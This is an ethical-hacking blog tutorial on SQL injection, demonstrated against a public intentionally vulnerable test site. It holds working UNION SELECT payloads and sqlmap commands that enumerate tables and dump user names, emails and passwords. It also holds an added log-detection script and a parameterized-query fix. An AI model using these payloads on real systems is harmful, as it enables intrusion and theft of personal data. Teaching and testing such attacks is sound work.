
How to perform a basic SQL Injection Attack? — Ethical Hacking


How does a SQL Injection attack work?

A SQL injection attack is possible when a website takes input from the user and uses that input directly to build a query that it runs against MySQL. In this blog, I will demonstrate how to perform a basic SQL Injection Attack on a website, and at the end I will talk about a tool, SQLmap, which automates the entire process.

If you don't know what a SQL Injection Attack is, you can visit this link: https://www.w3schools.com/sql/sql_injection.asp

There's a website, http://testphp.vulnweb.com/listproducts.php?cat=1, which is open for testing PHP vulnerabilities. I will be using this website to perform the SQLi attack.


1. Discovering if the website is vulnerable to SQL Injection attacks

The most basic and simple way is to check the URLs of the pages you are visiting. If the URL is something of the form http://testphp.vulnweb.com/listproducts.php?cat=1, it is a potential target. To check if the webpage is actually using a SQL backend, you can append \ or a single quote (') at the end of the URL and see if anything on the page breaks or you get an SQL error. In most cases the error looks something like this:

You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''a\'' at line 1

But the error can be anything else as well. For the website http://testphp.vulnweb.com/listproducts.php?cat=1, appending ' gives me the following screen:


So I have established that a SQL injection attack is possible on my target http://testphp.vulnweb.com/listproducts.php?cat=1.


In the backend, the application might be running a query similar to the following, with the value of the cat parameter pasted straight into the SQL text:

SELECT * FROM XYZ_TABLE WHERE CAT=<the value of cat>

The query executed for http://testphp.vulnweb.com/listproducts.php?cat=1 would be

SELECT * FROM XYZ_TABLE WHERE CAT=1'

And you guessed it right. This will throw an error.

The silver lining is that we now know we can modify the query in any way we like. If I add --+ to the end, the query should run without errors. (--+ or # comments out anything written after it. This is handy knowledge, though it may not be useful in this case.)


2. Finding out the Databases present

The next step would be to find out the databases present. To do that we first need the number of columns the page's query returns, and we make use of the ORDER BY clause for this. If I run http://testphp.vulnweb.com/listproducts.php?cat=1 order by 5, the corresponding MySQL query would be

SELECT * FROM XYZ_TABLE WHERE CAT=1 order by 5--+'

This will sort the results by the fifth column.

I repeat this process for increasing column numbers until I hit one for which the page breaks; e.g. in this case the page breaks at ORDER BY 12, so I now know that the total number of columns is 11. Since the number of columns is 11, I append union select all 1,2,3,4,5,6,7,8,9,10,11 to the URL.

The corresponding MySQL query would look like

SELECT * FROM XYZ_TABLE WHERE CAT=1 union select all 1,2,3,4,5,6,7,8,9,10,11

Now look through the webpage. In some places you will find some of the numbers between 1 and 11 displayed; I see the numbers 7, 2 and 9.

I now know that anything I put in the place of 7, 2 and 9 will be visible on the page. I want to know the current database, user and version, so I execute the same union query with those three positions replaced.

Note: %20 is the URL-encoded form of a space (ASCII 0x20), so it stands in for every space in the injected query.

I replaced 2 with user(), 7 with database() and 9 with version().

I will get to know the database, the database version and the user details.

I get the following information:

  1. database — acuart

  2. user — acuart@localhost

  3. version — 8.0.22-0ubuntu0.20.04.2


3. Discovering tables and table data in the current database

Once the above information is gathered, everything else is going to be very simple. To get the list of tables, I will just run the following.

Corresponding SQL Query:

SELECT * FROM XYZ_TABLE WHERE CAT=1 union select all 1,table_name,3,4,5,6,7,8,9,10,11 from information_schema.tables where table_schema = 'acuart'

information_schema is MySQL's built-in metadata database; its tables table lists the tables of every database on the server, which is what we used here to find the table names. acuart is the database name we got from the previous step.

The webpage would look like:

We got a list of tables:

  1. artists

  2. carts

  3. categ

  4. featured

  5. guestbook

  6. pictures

  7. products

  8. users

4. Discovering column names in a table

Discovering the columns of the table users:


Corresponding SQL Query:

SELECT * FROM XYZ_TABLE WHERE CAT=1 union select all 1,column_name,3,4,5,6,7,8,9,10,11 from information_schema.columns where table_name = 'users'

I get the column names as :

  1. uname

  2. pass

  3. cc

  4. address

  5. email

  6. name

  7. phone


5. Discovering data stored in a table

To view the name, email and password of users:

Corresponding SQL Query:

SELECT * FROM XYZ_TABLE WHERE CAT=1 union select all 1,name,3,4,5,6,email,8,pass,10,11 from users


6. Using SQLmap to do the above easily

If I wanted to use sqlmap to do the above, I would run the following commands on my terminal:

  1. sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" --dbs : get the list of databases

  2. sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" --current-db : get the current database

  3. sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" --tables -D acuart : get the list of tables in 'acuart'

  4. sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" --columns -T users -D acuart : get the columns in the table 'users'

  5. sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -T users -D acuart --dump : dump all the data in the table users
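As an added example that is not part of the original post, here is a small log checker that looks for the request patterns steps 1 to 6 produce (a stray quote, ORDER BY probes, UNION SELECT against information_schema, and a User-Agent that names sqlmap) in constructed access-log lines. The IPs, timestamps and User-Agent strings are made up, and the sqlmap header is only a weak signal since clients control it.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Constructed sample access-log lines (Combined Log Format) modelled on the
# requests made in the walkthrough above; none of this is real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Aug/2024:10:00:01 +0000] "GET /listproducts.php?cat=1 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Aug/2024:10:00:07 +0000] "GET /listproducts.php?cat=1%27 HTTP/1.1" 200 412 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Aug/2024:10:00:15 +0000] "GET /listproducts.php?cat=1%20order%20by%2012--+ HTTP/1.1" 200 398 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Aug/2024:10:00:30 +0000] "GET /listproducts.php?cat=1%20union%20select%20all%201,table_name,3%20from%20information_schema.tables HTTP/1.1" 200 6011 "-" "Mozilla/5.0"
198.51.100.9 - - [10/Aug/2024:10:05:00 +0000] "GET /listproducts.php?cat=2 HTTP/1.1" 200 5100 "-" "sqlmap/1.7 (https://sqlmap.org)"
"""

# Each rule is (name, regex) and is run against the *decoded* query string.
RULES = [
    ("union-select", re.compile(r"\bunion\b.*\bselect\b", re.I)),
    ("order-by-probe", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("schema-enum", re.compile(r"\binformation_schema\b", re.I)),
    ("sql-comment-tail", re.compile(r"(--|#)\s*$")),
    ("stray-quote", re.compile(r"'")),
]

# Combined Log Format: ip ident user [time] "method target proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \d+ "[^"]*" "([^"]*)"'
)


def analyse(log_text):
    """Return [(line_number, client_ip, [rule names hit])] for suspicious lines."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        m = LOG_RE.match(line)
        if not m:
            continue  # not a well-formed access-log line; skip rather than guess
        ip, _ts, _method, target, _status, ua = m.groups()
        # Decode once so %20 / %27 / '+' cannot hide the keywords from the rules.
        query = unquote_plus(urlsplit(target).query)
        hits = [name for name, rx in RULES if rx.search(query)]
        if "sqlmap" in ua.lower():
            hits.append("sqlmap-user-agent")
        if hits:
            findings.append((lineno, ip, hits))
    return findings


if __name__ == "__main__":
    for lineno, ip, hits in analyse(SAMPLE_LOG):
        print(f"line {lineno} from {ip}: {', '.join(hits)}")
```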


Summarising SQL Injection Attacks

A SQL Injection attack is one of the most powerful attacks a hacker can perform. There are many ways SQL injection attacks can be prevented, such as blacklisting or whitelisting certain input characters. Programming frameworks also provide query interfaces that accept user input only as the value of specific fields.
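As an added example (not from the original post), the string concatenation described in section 1 and the ORDER BY / UNION SELECT behaviour from section 2 are reproduced against an in-memory SQLite table standing in for XYZ_TABLE, next to the parameterized form that the prevention advice above refers to. The table and row contents are constructed, and SQLite's error text differs from MariaDB's, but the break/no-break behaviour is the same.

```python
import sqlite3


def make_db():
    # Constructed stand-in for the page's XYZ_TABLE and users table (not the real site's schema).
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE products (id INTEGER, cat INTEGER, name TEXT, price REAL)")
    db.execute("CREATE TABLE users (uname TEXT, pass TEXT)")
    db.executemany("INSERT INTO products VALUES (?, ?, ?, ?)",
                   [(1, 1, "poster", 9.5), (2, 1, "print", 12.0), (3, 2, "frame", 20.0)])
    db.execute("INSERT INTO users VALUES ('alice', 'p4ss')")
    return db


def list_products_vulnerable(db, cat):
    # Mirrors the backend described above: the raw ?cat= value is pasted into the SQL text,
    # so a quote breaks the statement and "order by" / "union select" become part of the query.
    return db.execute("SELECT * FROM products WHERE cat=" + cat).fetchall()


def list_products_safe(db, cat):
    # Hardened form: the value is bound as a parameter and is never parsed as SQL.
    return db.execute("SELECT * FROM products WHERE cat=?", (cat,)).fetchall()


def probe(func, db, cat):
    # Runs one handler with one ?cat= value and reports ("ok", rows) or ("error", message),
    # i.e. what the walkthrough reads off the screen as "page renders" vs. "page breaks".
    try:
        return ("ok", func(db, cat))
    except sqlite3.OperationalError as exc:
        return ("error", str(exc))


def compare(cat):
    # Same input through both handlers, side by side, on a fresh database.
    db = make_db()
    return {"vulnerable": probe(list_products_vulnerable, db, cat),
            "safe": probe(list_products_safe, db, cat)}


if __name__ == "__main__":
    for value in ["1", "1'", "1 order by 5", "1 union select all 1,uname,pass,4 from users"]:
        print(repr(value), compare(value))
```

With the parameterized handler every one of those inputs is simply a category value that matches nothing, so the quote probe, the column-count probe and the union all return an empty result instead of an error or extra rows.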


This blog was originally published on Gourav's personal blog: https://gourav-dhar.com
